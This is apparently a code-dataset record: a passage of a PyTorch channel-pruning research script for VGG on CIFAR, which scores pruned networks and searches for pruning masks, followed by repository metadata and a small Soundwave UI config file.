np.squeeze(np.argwhere(new_end_mask)) # # # print('In shape: {:d}, Out shape {:d}.'.format(idx0.size, idx1.size)) # if idx0.size == 1: # idx0 = np.resize(idx0, (1,)) # if idx1.size == 1: # idx1 = np.resize(idx1, (1,)) # w1 = m0.weight.data[:, idx0.tolist(), :, :].clone() # w1 = w1[idx1.tolist(), :, :, :].clone() # m1.weight.data = w1.clone() # elif isinstance(m0, nn.Linear): # idx0 = np.squeeze(np.argwhere(start_mask)) # if idx0.size == 1: # idx0 = np.resize(idx0, (1,)) # m1.weight.data = m0.weight.data[:, idx0].clone() # m1.bias.data = m0.bias.data.clone() layer_id_in_cfg = 0 start_mask = np.ones(3) end_mask = cfg_mask[layer_id_in_cfg] parameter_buffer = {} for m0 in model.modules(): if isinstance(m0, nn.BatchNorm2d): key = str(layer_id_in_cfg) + 'BatchNorm' value = [] if np.sum(end_mask) == 0: pass else: idx1 = np.squeeze(np.argwhere(end_mask)) if idx1.size == 1: idx1 = np.resize(idx1, (1,)) value.append(m0.weight.data[idx1.tolist()].clone()) value.append(m0.bias.data[idx1.tolist()].clone()) value.append(m0.running_mean[idx1.tolist()].clone()) value.append(m0.running_var[idx1.tolist()].clone()) start_mask = copy.copy(end_mask) parameter_buffer[key] = value layer_id_in_cfg += 1 if layer_id_in_cfg < len(cfg_mask): # do not change in Final FC end_mask = cfg_mask[layer_id_in_cfg] elif isinstance(m0, nn.Conv2d): key = str(layer_id_in_cfg) + 'Conv' value = [] if np.sum(end_mask) == 0: pass else: idx0 = np.squeeze(np.argwhere(start_mask)) idx1 = np.squeeze(np.argwhere(end_mask)) if idx0.size == 1: idx0 = np.resize(idx0, (1,)) if idx1.size == 1: idx1 = np.resize(idx1, (1,)) w1 = m0.weight.data[:, idx0.tolist(), :, :].clone() w1 = w1[idx1.tolist(), :, :, :].clone() value.append(w1.clone()) parameter_buffer[key] = value elif isinstance(m0, nn.Linear): key = str(layer_id_in_cfg) + 'Linear' value = [] idx0 = np.squeeze(np.argwhere(start_mask)) if idx0.size == 1: idx0 = np.resize(idx0, (1,)) value.append(m0.weight.data[:, idx0].clone()) value.append(m0.bias.data.clone()) 
parameter_buffer[key] = value layer_id_in_cfg = 0 for m1 in newmodel.modules(): if isinstance(m1, nn.BatchNorm2d): key = str(layer_id_in_cfg) + 'BatchNorm' while len(parameter_buffer[key]) == 0: layer_id_in_cfg += 1 key = str(layer_id_in_cfg) + 'BatchNorm' m1.weight.data = parameter_buffer[key][0] m1.bias.data = parameter_buffer[key][1] m1.running_mean = parameter_buffer[key][2] m1.running_var = parameter_buffer[key][3] layer_id_in_cfg += 1 elif isinstance(m1, nn.Conv2d): key = str(layer_id_in_cfg) + 'Conv' while len(parameter_buffer[key]) == 0: layer_id_in_cfg += 1 key = str(layer_id_in_cfg) + 'Conv' m1.weight.data = parameter_buffer[key][0] elif isinstance(m1, nn.Linear): key = str(layer_id_in_cfg) + 'Linear' m1.weight.data = parameter_buffer[key][0] m1.bias.data = parameter_buffer[key][1] pass return newmodel def get_batch_jacobian(net, x, target, device): net.zero_grad() x.requires_grad_(True) y = net(x) y.backward(torch.ones_like(y)) jacob = x.grad.detach() return jacob, target.detach(), y.detach() def check_score(model, train_loader, sanity_check=False): newmodel = copy.deepcopy(model) reset_seed() newmodel.K = np.zeros((args.test_batch_size, args.test_batch_size)) def counting_forward_hook(module, inp, out): try: if not module.visited_backwards: return if isinstance(inp, tuple): inp = inp[0] inp = inp.view(inp.size(0), -1) x = (inp > 0).float() K = x @ x.t() K2 = (1. - x) @ (1. 
- x.t()) newmodel.K = newmodel.K + K.cpu().numpy() + K2.cpu().numpy() except: pass def counting_backward_hook(module, inp, out): module.visited_backwards = True for name, module in newmodel.named_modules(): if 'ReLU' in str(type(module)): # hooks[name] = module.register_forward_hook(counting_hook) module.register_forward_hook(counting_forward_hook) module.register_backward_hook(counting_backward_hook) newmodel = newmodel.to(device) s = [] for j in range(5): data_iterator = iter(train_loader) x, target = next(data_iterator) if sanity_check: x = shuffle_data(x) x2 = torch.clone(x) x2 = x2.to(device) x, target = x.to(device), target.to(device) jacobs, labels, y = get_batch_jacobian(newmodel, x, target, device) newmodel(x2.to(device)) s_, ld = np.linalg.slogdet(newmodel.K) s.append(ld) score = np.mean(s) return score def check_channel_score(model, train_loader, sanity_check=False): newmodel = copy.deepcopy(model) reset_seed() def counting_forward_hook(module, inp, out): try: # if not module.visited_backwards: # return if isinstance(inp, tuple): inp = inp[0] K_layer = np.zeros((args.test_batch_size, args.test_batch_size)) inp = inp.permute(1, 0, 2, 3) inp = inp.view(inp.size(0), inp.size(1), -1) inp = (inp > 0).float() score_list = [] for i in range(inp.size(0)): x = inp[i] K1 = x @ x.t() K2 = (1. - x) @ (1. 
- x.t()) K = K1.cpu().numpy() + K2.cpu().numpy() K_layer += K # s_, ld = np.linalg.slogdet(K) s_, ld = np.linalg.slogdet(K/inp.size(2)) score_list.append(ld) s_, ld = np.linalg.slogdet(K_layer/(inp.size(0)*inp.size(2))) # s_, ld = np.linalg.slogdet(K_layer) newmodel.layer_score.append(ld) newmodel.channel_score.append(score_list) except Exception as e: print(e) def counting_backward_hook(module, inp, out): module.visited_backwards = True def counting_backward_hook_ini(module, inp, out): newmodel.layer_score = [] newmodel.channel_score = [] for name, module in newmodel.named_modules(): if 'ReLU' in str(type(module)): # hooks[name] = module.register_forward_hook(counting_hook) module.register_forward_hook(counting_forward_hook) if name == 'feature.0': module.register_forward_hook(counting_backward_hook_ini) newmodel = newmodel.to(device) s = [] layer_s = [] for j in range(5): data_iterator = iter(train_loader) x, target = next(data_iterator) if sanity_check: x = shuffle_data(x) x2 = torch.clone(x) x2 = x2.to(device) x, target = x.to(device), target.to(device) # jacobs, labels, y = get_batch_jacobian(newmodel, x, target, device) newmodel(x2.to(device)) s.append(copy.deepcopy(newmodel.channel_score)) layer_s.append(copy.deepcopy(newmodel.layer_score)) layer_s = np.array(layer_s) layer_s = np.mean(layer_s, axis=0) channel_score = [] for channel in range(len(s[0])): tep = [] for j in range(len(s)): tep.append(s[j][channel]) tep = np.array(tep) tep = np.mean(tep, axis=0) channel_score.append(tep) # s = np.array(s).astype(float) # # s = np.mean(s, axis=0) # s = s.transpose() # tep = np.array(s[0]) return layer_s, channel_score def pruning(model): total = 0 cfg = [] cfg_mask = [] for m in model.modules(): if isinstance(m, nn.BatchNorm2d): total += m.weight.data.shape[0] bn = torch.zeros(total) index = 0 for m in model.modules(): if isinstance(m, nn.BatchNorm2d): size = m.weight.data.shape[0] bn[index:(index+size)] = m.weight.data.abs().clone() index += size y, i = 
torch.sort(bn) thre_index = int(total * args.percent) thre = y[thre_index] # print('Pruning threshold: {}'.format(thre)) mask = torch.zeros(total) index = 0 for k, m in enumerate(model.modules()): if isinstance(m, nn.BatchNorm2d): size = m.weight.data.numel() weight_copy = m.weight.data.abs().clone() _mask = weight_copy.gt(thre.cuda()).float().cuda() cfg_mask.append(_mask.clone()) if int(torch.sum(_mask)) > 0: cfg.append(int(torch.sum(_mask))) mask[index:(index+size)] = _mask.view(-1) # print('layer index: {:d} \t total channel: {:d} \t remaining channel: {:d}'.format(k, _mask.shape[0], int(torch.sum(_mask)))) index += size elif isinstance(m, nn.MaxPool2d): cfg.append('M') # print('Pre-processing Successful!') return mask, cfg, cfg_mask def create_cfg(cfg_mask_all, indicator): form = copy.deepcopy(cfg_mask_all) while 'M' in form: form.remove('M') # np.random.shuffle(mask_all) cfg_mask = [] end = 0 for i in form: cfg_mask.append(indicator[end:end + i]) end += i cfg = [] index = 0 for i in range(len(cfg_mask_all)): if cfg_mask_all[i] != 'M': if np.sum(cfg_mask[index]) != 0: cfg.append(int(np.sum(cfg_mask[index]))) index += 1 else: cfg.append('M') return cfg, cfg_mask def random_search(cfg_mask_all, percent): form = copy.deepcopy(cfg_mask_all) while 'M' in form: form.remove('M') total = np.sum(form) choose_num = int(total * percent) mask_all = np.append(np.ones(choose_num), np.zeros(total - choose_num)) record_dict = {} for i in range(len(mask_all)): record_dict[i] = [] score_test = 0 trail_index = 0 while score_test < 1450: for i in range(100): np.random.shuffle(mask_all) cfg, cfg_mask = create_cfg(cfg_mask_all, mask_all) model_new = create_model(model, cfg, cfg_mask) score = check_score(model_new, train_loader) for i in range(len(mask_all)): if not mask_all[i]: record_dict[i].append(score) average_score = pd.DataFrame([], columns=["position", "score"]) for i in range(len(mask_all)): info_dict = { 'position':i, 'score':np.max(record_dict[i]) } average_score = 
average_score.append(info_dict, ignore_index=True) average_score = average_score.sort_values(by=['score'], ascending=False) indexes = average_score['position'][0: int(len(average_score) * percent)] indexes = indexes.astype(int) indicator = np.ones(total) indicator[indexes] = 0 cfg, cfg_mask = create_cfg(cfg_mask_all, indicator) model_new = create_model(model, cfg, cfg_mask) score = check_score(model_new, train_loader) info_dict = { 'index': trail_index, 'cfg': cfg, 'cfg_mask': cfg_mask, 'score': score } wandb.log(info_dict) print('The trial of {}, the score is {:.2f}'.format(trail_index, score)) trail_index += 1 if score > score_test: score_test = score np.save('{:.2f}.npy'.format(score_test), info_dict) def reset_seed(seed=1): np.random.seed(seed) torch.manual_seed(seed) random.seed(seed) def count_channel(model): cfg_mask_all = [] for m in model.modules(): if isinstance(m, nn.BatchNorm2d): cfg_mask_all.append(m.weight.data.shape[0]) elif isinstance(m, nn.MaxPool2d): cfg_mask_all.append('M') form = copy.deepcopy(cfg_mask_all) while 'M' in cfg_mask_all: cfg_mask_all.remove('M') total = np.sum(cfg_mask_all) return total, form def shuffle_data(xs): Size = xs.size() # e.g. 
for CIFAR100, is 50000 * 32 * 32 * 3 xs = xs.reshape(Size[0], -1) for i in range(Size[0]): xs[i] = xs[i][torch.randperm(xs[i].nelement())] xs = xs.reshape(Size) return xs def greedy_search_new(model, percent, train_loader): buffer = 33 total, form = count_channel(model) channel_num = total progress_index = 0 indicator = np.ones(total) while channel_num > total * percent: # indicator = np.ones(total) score_dict = pd.DataFrame([], columns=['index', 'score']) for position in range(total): if indicator[position]: indicator_tep = copy.deepcopy(indicator) indicator_tep[position] = 0 cfg, cfg_mask = create_cfg(form, indicator_tep) model_new = create_model(model, cfg, cfg_mask) score = check_score(model_new, train_loader) info_dict = { 'index': position, 'score': score } score_dict = score_dict.append(info_dict, ignore_index=True) print('{}----{}/{}: score {:.2f}'.format(channel_num, position, total, score)) else: score = -1 info_dict = { 'index': position, 'score': -1, } score_dict = score_dict.append(info_dict, ignore_index=True) print('{}----{}/{}: score {:.2f}'.format(channel_num, position, total, score)) score_dict = score_dict.sort_values(by=['score'], ascending=False) indexes = score_dict['index'][0:buffer] indexes = indexes.astype(int) indicator[indexes] = 0 cfg, cfg_mask = create_cfg(form, indicator) channel_num = count_cfg_channel(cfg) newmodel = create_model(model, cfg, cfg_mask) score = check_score(newmodel, train_loader) info_dict = { 'index': progress_index*buffer, 'score': score } wandb.log(info_dict) progress_index += 1 # for i in range(len(cfg_mask)): # cfg = copy.copy(cfg_mask) # cfg[i] -= 1 # newmodel = models.__dict__[args.arch](dataset=args.dataset, cfg=cfg) # score = check_score(newmodel, train_loader) # score_dict[i] = score # print(score_dict) save_dict = { 'state_dict': newmodel.state_dict(), 'cfg': cfg, 'cfg_mask': cfg_mask, 'score': score } torch.save(save_dict, '{:.2f}.pth'.format(score)) # np.save('{:.2f}.npy'.format(score), save_dict) def 
channel_score_search(model, percent, train_loader): total, form = count_channel(model) indicator = np.ones(total) cfg, cfg_mask = create_cfg(form, indicator) new_model = copy.copy(model) for i in range(0, len(cfg_mask)): # score = check_score(new_model, train_loader) channel_score = check_channel_score(new_model, train_loader) channel_score = channel_score[i] channel_score_rank = copy.deepcopy(channel_score) channel_score_rank.sort() thre_index = int(len(channel_score)*percent) thre_score = channel_score_rank[thre_index-1] mask = [0 if j <= thre_score else 1 for j in channel_score] cfg_mask[i] = mask indicator_tep = [] for j in cfg_mask: indicator_tep += list(j) cfg_new, cfg_mask_new = create_cfg(form, indicator_tep) new_model = create_model(model, cfg_new, cfg_mask_new) score = check_score(new_model, train_loader) print(score) def rate_check(model, percent, train_loader): xshape = (1, 3, 32, 32) flops_original, param_original = get_model_infos(model, xshape) total, form = count_channel(model) indicator = np.ones(total) cfg, cfg_mask = create_cfg(form, indicator) f_list = [] p_list = [] for i in range(len(cfg_mask)): cfg_mask_new = copy.deepcopy(cfg_mask) cfg_mask_new[i][0:30] = 0 indicator_new = [] for one in cfg_mask_new: indicator_new += list(one) cfg_new, cfg_mask_new = create_cfg(form, indicator_new) model_new = create_model(model, cfg_new, cfg_mask_new) flops, param = get_model_infos(model_new, xshape) flops_rate = (flops_original-flops)/flops_original param_rate = (param_original-param)/param_original f_list.append(flops_rate) p_list.append(param_rate) print("") def channel_remove_check(model, train_loader, goal_f_rate, goal_p_rate): baseline_f_rate = 260292527 / 313772032 baseline_p_rate = 8300726 / 15299748 xshape = (1, 3, 32, 32) flops_original, param_original = get_model_infos(model, xshape) score = check_score(model, train_loader, True) score_layer_original, score_channel_original = check_channel_score(model, train_loader, True) total, form = 
count_channel(model) indicator = np.ones(total) cfg_original, cfg_mask_original = create_cfg(form, indicator) cfg_mask = copy.deepcopy(cfg_mask_original) model_new = copy.deepcopy(model) for i in range(len(cfg_mask_original)-1): score_layer, score_channel = check_channel_score(model_new, train_loader, True) cfg_mask[i] = score_channel[i] != -np.inf indicator = [] for one in cfg_mask: indicator += list(one) cfg, cfg_mask = create_cfg(form, indicator) model_new = create_model(model, cfg, cfg_mask) flops, param = get_model_infos(model_new, xshape) f_rate = flops / flops_original p_rate = param / param_original print(f_rate) index = 0 while f_rate > goal_f_rate: score_layer, score_channel = check_channel_score(model_new, train_loader) score_channel[-1] = np.ones(score_channel[-1].shape)*5000 indicator = [] for one in score_channel: indicator += list(one) min_index = indicator.index(min(indicator)) indicator = np.ones(len(indicator)) indicator[min_index] = 0 cfg, cfg_mask = create_cfg(cfg, indicator) model_new = create_model(model_new, cfg, cfg_mask) flops, param = get_model_infos(model_new, xshape) f_rate = flops / flops_original p_rate = param / param_original print(f_rate) info_dict = { "f_rate": f_rate, "p_rate": p_rate, "cfg": cfg, "index": index, } # wandb.log(info_dict) index += 1 score_prune = check_score(model_new, train_loader) torch.save(model_new, 'shuffle_channel_remove_n_f{:.4f}_p{:.4f}_{:.2f}.pth'.format(f_rate, p_rate, score_prune)) def ratio_cfg(form, ratio): output = [] for i in range(len(form)-1): if form[i] != 'M': form[i] = round(form[i]*ratio) return form def layer_wise_pruning(model, train_loader, pruning_rate): xshape = (1, 3, 32, 32) flops_original, param_original = get_model_infos(model, xshape) score = check_score(model, train_loader) score_layer_original, score_channel_original = check_channel_score(model, train_loader) total, form = count_channel(model) cfg_goal = ratio_cfg(copy.deepcopy(form), pruning_rate) # model_new = 
models.__dict__['vgg'](dataset='cifar100', cfg=cfg_goal) # flops, param = get_model_infos(model_new, xshape) # f_rate = flops / flops_original # p_rate = param / param_original # score = check_score(model_new, train_loader) while 'M' in cfg_goal: cfg_goal.remove('M') indicator = np.ones(total) cfg_original, cfg_mask_original = create_cfg(form, indicator) cfg_mask = copy.deepcopy(cfg_mask_original) model_new = copy.deepcopy(model) for i in range(len(cfg_mask_original)-1): score_layer, score_channel = check_channel_score(model_new, train_loader) pruning_num = np.sum(cfg_mask[i])-cfg_goal[i] ranked_score = copy.deepcopy(score_channel[i]) ranked_score.sort() thre_score = ranked_score[int(pruning_num)-1] if thre_score != -np.inf: cfg_mask[i] = score_channel[i] > thre_score else: tep = score_channel[i] == -np.inf index = np.where(tep == 1) index = np.random.choice(index[0], int(pruning_num), replace= False) tep = np.array(cfg_mask[i]) tep[index] = 0 cfg_mask[i] = list(tep) indicator = [] for one in cfg_mask: indicator += list(one) cfg, cfg_mask = create_cfg(form, indicator) model_new = create_model(model, cfg, cfg_mask) flops, param = get_model_infos(model_new, xshape) f_rate = flops / flops_original p_rate = param / param_original print(f_rate) # # index = 0 # while f_rate > goal_f_rate: # score_layer, score_channel = check_channel_score(model_new, train_loader) # score_channel[-1] = np.ones(score_channel[-1].shape)*5000 # indicator = [] # for one in score_channel: # indicator += list(one) # min_index = indicator.index(min(indicator)) # indicator = np.ones(len(indicator)) # indicator[min_index] = 0 # cfg, cfg_mask = create_cfg(cfg, indicator) # model_new = create_model(model_new, cfg, cfg_mask) # flops, param = get_model_infos(model_new, xshape) # f_rate = flops / flops_original # p_rate = param / param_original # print(f_rate) # info_dict = { # "f_rate": f_rate, # "p_rate": p_rate, # "cfg": cfg, # "index": index, # } # wandb.log(info_dict) # index += 1 score_prune = 
check_score(model_new, train_loader) torch.save(model_new, 'layer_wise_pruning_rate{}_f{:.4f}_p{:.4f}_{:.2f}.pth'.format(pruning_rate, f_rate, p_rate, score_prune)) def layer_remove_check(model, train_loader): baseline_f_rate = 260292527/313772032 baseline_p_rate = 8300726/15299748 xshape = (1, 3, 32, 32) flops_original, param_original = get_model_infos(model, xshape) score = check_score(model, train_loader) score_layer_original, score_channel_original = check_channel_score(model, train_loader) total, form = count_channel(model) indicator = np.ones(total) cfg, cfg_mask = create_cfg(form, indicator) # cut_list = [11,10,8,7,4,5,2,0] cut_list_all = [10, 0, 11, 7, 8, 2, 4, 5] cut_list = cut_list_all[:1] for one in cut_list: cfg_mask[one] = np.zeros(len(cfg_mask[one])) # cfg_mask[4] = np.zeros(len(cfg_mask[4])) indicator_new = [] for one in cfg_mask: indicator_new += list(one) cfg_new, cfg_mask_new = create_cfg(form, indicator_new) model_new = create_model(model, cfg_new, cfg_mask_new) flops, param = get_model_infos(model_new, xshape) score_prune = check_score(model_new, train_loader) f_rate = flops/flops_original p_rate = param/param_original score_layer, score_channel = check_channel_score(model_new, train_loader) # for one in score_channel: # print(np.sum(one == -np.inf), len(one)) # # save_dict = { # 'state_dict': model_new.state_dict(), # 'cfg': cfg_new, # 'cfg_mask': cfg_mask_new, # 'score': score_prune # } # torch.save(model_new, '{:.2f}.pth'.format(score_prune)) # model_new = models.__dict__[args.arch](dataset=args.dataset, cfg = cfg_new) # score_prune = check_score(model_new, train_loader) # score_layer, score_channel = check_channel_score(model_new, train_loader) torch.save(model_new, '{}-{:.2f}.pth'.format(len(cut_list),score_prune)) print("") # f_list = [] # p_list = [] # # for i in range(len(cfg_mask)): # cfg_mask_new = copy.deepcopy(cfg_mask) # cfg_mask_new[i][0:30] = 0 # indicator_new = [] # for one in cfg_mask_new: # indicator_new += list(one) # cfg_new, 
cfg_mask_new = create_cfg(form, indicator_new) # model_new = create_model(model, cfg_new, cfg_mask_new) # flops, param = get_model_infos(model_new, xshape) # flops_rate = (flops_original-flops)/flops_original # param_rate = (param_original-param)/param_original # f_list.append(flops_rate) # p_list.append(param_rate) def count_cfg_channel(cfg): form = copy.deepcopy(cfg) while 'M' in form: form.remove('M') channel = np.sum(form) return channel def create_base(model, train_loader): total, form = count_channel(model) indicator = [] for one in form: if one != 'M': tep = np.zeros(one) tep[0] = 1 indicator.append(tep) for i in range(len(indicator)): record = pd.DataFrame([], columns=["index", "score"]) for j in range(len(indicator[i])): tep = np.zeros(len(indicator[i])) tep[j] = 1 indicator_tep = copy.deepcopy(indicator) indicator_tep[i] = tep indicator_list = [] for k in indicator_tep: indicator_list += list(k) indicator_tep = np.array(indicator_list).astype(int) cfg, cfg_mask = create_cfg(form, indicator_tep) new_model = create_model(model, cfg, cfg_mask) score = check_score(new_model, train_loader) info_dict = { "index": j, "score": score } record = record.append(info_dict, ignore_index=True) # print("for the {}-th module, tried {}/{}, the score is {:.2f}".format(i, j, len(indicator[i]), score)) record = record.sort_values(by=['score'], ascending=False) indexes = record['index'][0] tep = np.zeros(len(indicator[i])) tep[int(indexes)] = 1 indicator[i] = tep print("for the {}-th module, tried {}/{}, the score is {:.2f}".format(i, j, len(indicator[i]), record['score'][0])) indicator_list = [] for i in indicator: indicator_list += (list(i)) indicator = np.array(indicator_list) return indicator def greedy_search_increase(model, percent, train_loader): buffer = 11 total, form = count_channel(model) indicator = create_base(model, train_loader) left_channels = int(total*percent - np.sum(indicator)) while left_channels > 0: record = pd.DataFrame([], columns=["index", "score"]) 
for i in range(len(indicator)): if indicator[i]: print("already chosen") else: indicator_tep = copy.deepcopy(indicator) cfg, cfg_mask = create_cfg(form, indicator_tep) new_model = create_model(model, cfg, cfg_mask) score = check_score(new_model, train_loader) info_dict = { "index": i, "score": score } record = record.append(info_dict, ignore_index=True) record = record.sort_values(by=['score'], ascending=False) if left_channels < buffer: buffer = left_channels indexes = record['index'][0:buffer] indexes = indexes.astype(int) indicator[indexes] = 1 cfg, cfg_mask = create_cfg(form, indicator) new_model = create_model(model, cfg, cfg_mask) score = check_score(new_model, train_loader) left_channels = int(total * percent - np.sum(indicator)) print("Still have {} channels to prune, now the highest score is {:.2f}".format(left_channels, score)) info_dict = { "channels": np.sum(indicator), "score": score } wandb.log(info_dict) save_dict = { 'state_dict': new_model.state_dict(), 'cfg': cfg, 'cfg_mask': cfg_mask, 'score': score } torch.save(save_dict, '{:.2f}.pth'.format(score)) def greedy_search(model, percent, train_loader): total, form = count_channel(model) index_trial = 0 while count_cfg_channel(form) > total*percent: score_list = [] for i in range(len(form)): if form[i] != 'M': cfg = copy.deepcopy(form) cfg[i] -= 1 newmodel = models.__dict__[args.arch](dataset=args.dataset, cfg = cfg) score = check_score(newmodel, train_loader) score_list.append(score) else: score_list.append(-1) max_score = max(score_list) index = score_list.index(max_score) info_dict = { 'index': index_trial, 'cfg': form, 'score': max_score } index_trial +=1 wandb.log(info_dict) form[index] -= 1 print(max_score) info_dict = { 'cfg': form, 'score': max_score } np.save('{:.2f}.npy'.format(score), info_dict) # cfg_mask_all = [] # for m in model.modules(): # if isinstance(m, nn.BatchNorm2d): # cfg_mask_all.append(m.weight.data.shape[0]) # elif isinstance(m, nn.MaxPool2d): # cfg_mask_all.append('M') # # 
form = copy.deepcopy(cfg_mask_all) # while 'M' in form: # form.remove('M') # total = np.sum(form) # indicator = np.ones(total) # cfg_mask = [] # end = 0 # for i in form: # cfg_mask.append(indicator[end:end + i]) # end += i # bn = torch.zeros(total) # cfg = [] # index = 0 # for i in range(len(cfg_mask_all)): # if cfg_mask_all[i] != 'M': # cfg.append(int(np.sum(cfg_mask[index]))) # index += 1 # else: # cfg.append('M') # model_new = create_model(model, cfg, cfg_mask) # score = check_score(model_new, train_loader) # score_dict = pd.DataFrame([], columns=['index', 'score']) # score_dict.to_csv('score_indicator.csv') # score_dict = score_dict.sort_values(by=['score'], ascending=False) # indexes = score_dict['index'][0: int(len(score_dict)*percent)] # indexes = indexes.astype(int) # indicator_tep = copy.deepcopy(indicator) # indicator_tep[indexes] = 0 # cfg_mask = [] # end = 0 # for i in form: # cfg_mask.append(indicator_tep[end:end + i]) # end += i # cfg = [] # index = 0 # for i in range(len(cfg_mask_all)): # if cfg_mask_all[i] != 'M': # cfg.append(int(np.sum(cfg_mask[index]))) # index += 1 # else: # cfg.append('M') # model_new = create_model(model, cfg, cfg_mask) # score = check_score(model_new, train_loader) # info_dict = { # 'cfg': cfg, # 'cfg_mask': cfg_mask, # 'score': score # } # np.save('{:.2f}.npy'.format(score), info_dict) if __name__ == '__main__': parser = argparse.ArgumentParser(description='PyTorch Slimming CIFAR prune') parser.add_argument('--dataset', type=str, default='cifar100', help='training dataset (default: cifar10)') parser.add_argument('--test-batch-size', type=int, default=128, metavar='N', help='input batch size for testing (default: 256)') parser.add_argument('--no-cuda', action='store_true', default=False, help='disables CUDA training') parser.add_argument('--depth', type=int, default=16, help='depth of the vgg') parser.add_argument('--percent', type=float, default=0.5, help='scale sparse rate (default: 0.5)') parser.add_argument('--model', 
default='', type=str, metavar='PATH', help='path to the model (default: none)') parser.add_argument('--save', default='./baseline/vgg16-cifar100', type=str, metavar='PATH', help='path to save pruned model (default: none)') parser.add_argument('--save_1', default='./baseline/vgg16-cifar100', type=str, metavar='PATH', help='path to save pruned model (default: none)') parser.add_argument('--start_epoch', default=1, type=int, metavar='N', help='manual start epoch number') parser.add_argument('--end_epoch', default=160, type=int, metavar='N', help='manual end epoch number') # quantized parameters parser.add_argument('--bits_A', default=8, type=int, help='input quantization bits') parser.add_argument('--bits_W', default=8, type=int, help='weight quantization bits') parser.add_argument('--bits_G', default=8, type=int, help='gradient quantization bits') parser.add_argument('--bits_E', default=8, type=int, help='error quantization bits') parser.add_argument('--bits_R', default=16, type=int, help='rand number quantization bits') parser.add_argument('--arch', default='vgg', type=str, help='architecture to use') # multi-gpus parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. 
use -1 for CPU') args = parser.parse_args() args.cuda = not args.no_cuda and torch.cuda.is_available() seed = 1 random.seed(seed) np.random.seed(seed) torch.manual_seed(seed) if not os.path.exists(args.save): os.makedirs(args.save) gpu = args.gpu_ids gpu_ids = args.gpu_ids.split(',') args.gpu_ids = [] for gpu_id in gpu_ids: id = int(gpu_id) if id > 0: args.gpu_ids.append(id) if len(args.gpu_ids) > 0: torch.cuda.set_device(args.gpu_ids[0]) device = torch.device("cuda" if torch.cuda.is_available() else "cpu") if args.arch.endswith('lp'): # model = models.__dict__[args.arch](bits_A=args.bits_A, bits_E=args.bits_E, bits_W=args.bits_W, dataset=args.dataset, depth=args.depth) model = models.__dict__[args.arch](8, 8, 32, dataset=args.dataset, depth=args.depth) elif args.dataset == 'imagenet': model = models.__dict__[args.arch](pretrained=False) if len(args.gpu_ids) > 1: model = torch.nn.DataParallel(model, device_ids=args.gpu_ids) else: model = models.__dict__[args.arch](dataset=args.dataset, depth=args.depth) if args.dataset == 'cifar10': train_loader = torch.utils.data.DataLoader( datasets.CIFAR10('./data.cifar10', train=True, download=True, transform=transforms.Compose([ transforms.Pad(4), transforms.RandomCrop(32), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) test_loader = torch.utils.data.DataLoader( datasets.CIFAR10('./data.cifar10', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) else: train_loader = torch.utils.data.DataLoader( datasets.CIFAR100('./data.cifar100', train=True, download=True, transform=transforms.Compose([ transforms.Pad(4), transforms.RandomCrop(32), transforms.RandomHorizontalFlip(), transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 
0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) test_loader = torch.utils.data.DataLoader( datasets.CIFAR100('./data.cifar100', train=False, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)) ])), batch_size=args.test_batch_size, shuffle=True) if args.cuda: model.cuda() wandb_project = 'pruning_score' name = 'with_out_normalization_60' # wandb.init(project=wandb_project, name=name) # # random_search(cfg_mask_all, args.percent) # channel_score_search(model, args.percent, train_loader) # greedy_search(model, args.percent, train_loader) # layer_remove_check(model, train_loader) # rate_check(model, args.percent, train_loader) channel_remove_check(model, train_loader, 0.61, 0.2) # layer_wise_pruning(model, train_loader, 0.8) # # data = np.load('1633.66.npy', allow_pickle=True) # data = data.item() # cfg = data['cfg'] # cfg_mask = data['mask_cfg'] # for i in range(len(cfg_mask)): # cfg_mask[i] = np.asarray(cfg_mask[i].cpu().numpy()) # score = check_score(model, cfg, cfg_mask) # print(score)
33,255
0
483
6716a726078f16e1423a1e22103925e9d6218fcc
234
py
Python
ui/config.py
fakeNetflix/pinterest-repo-soundwave
189b30708502cb6b76cd7a895bbd4389b0142e2f
[ "Apache-2.0" ]
104
2017-05-14T23:28:10.000Z
2021-04-25T11:20:19.000Z
ui/config.py
fakeNetflix/pinterest-repo-soundwave
189b30708502cb6b76cd7a895bbd4389b0142e2f
[ "Apache-2.0" ]
17
2020-03-04T23:22:31.000Z
2021-12-09T21:31:06.000Z
ui/config.py
fakeNetflix/pinterest-repo-soundwave
189b30708502cb6b76cd7a895bbd4389b0142e2f
[ "Apache-2.0" ]
18
2017-05-16T22:40:24.000Z
2022-02-21T15:35:20.000Z
"""Config data for cmdb UI.""" SOUNDWAVE_API = "http://soundwave-api/v2/" SOUNDWAVE_HOST = "0.0.0.0" SOUNDWAVE_PORT = 80 SOUNDWAVE_LOG_PATH = "/var/log/soundwave_ui/" SOUNDWAVE_ACCESS_LOG = "access.log" SOUNDWAVE_APP_LOG = "info.log"
29.25
45
0.739316
"""Config data for cmdb UI.""" SOUNDWAVE_API = "http://soundwave-api/v2/" SOUNDWAVE_HOST = "0.0.0.0" SOUNDWAVE_PORT = 80 SOUNDWAVE_LOG_PATH = "/var/log/soundwave_ui/" SOUNDWAVE_ACCESS_LOG = "access.log" SOUNDWAVE_APP_LOG = "info.log"
0
0
0
f6ca7e10f361d5fba876d39453a170a545ad8aea
786
py
Python
config/env_variables.py
Calpax-aaS/web-app
155a40a51b27f9741c137dcf144daabcb09d39ed
[ "BSD-3-Clause" ]
null
null
null
config/env_variables.py
Calpax-aaS/web-app
155a40a51b27f9741c137dcf144daabcb09d39ed
[ "BSD-3-Clause" ]
2
2021-06-09T18:48:49.000Z
2021-09-22T19:55:17.000Z
config/env_variables.py
Calpax-aaS/web-app
155a40a51b27f9741c137dcf144daabcb09d39ed
[ "BSD-3-Clause" ]
1
2022-03-02T20:55:50.000Z
2022-03-02T20:55:50.000Z
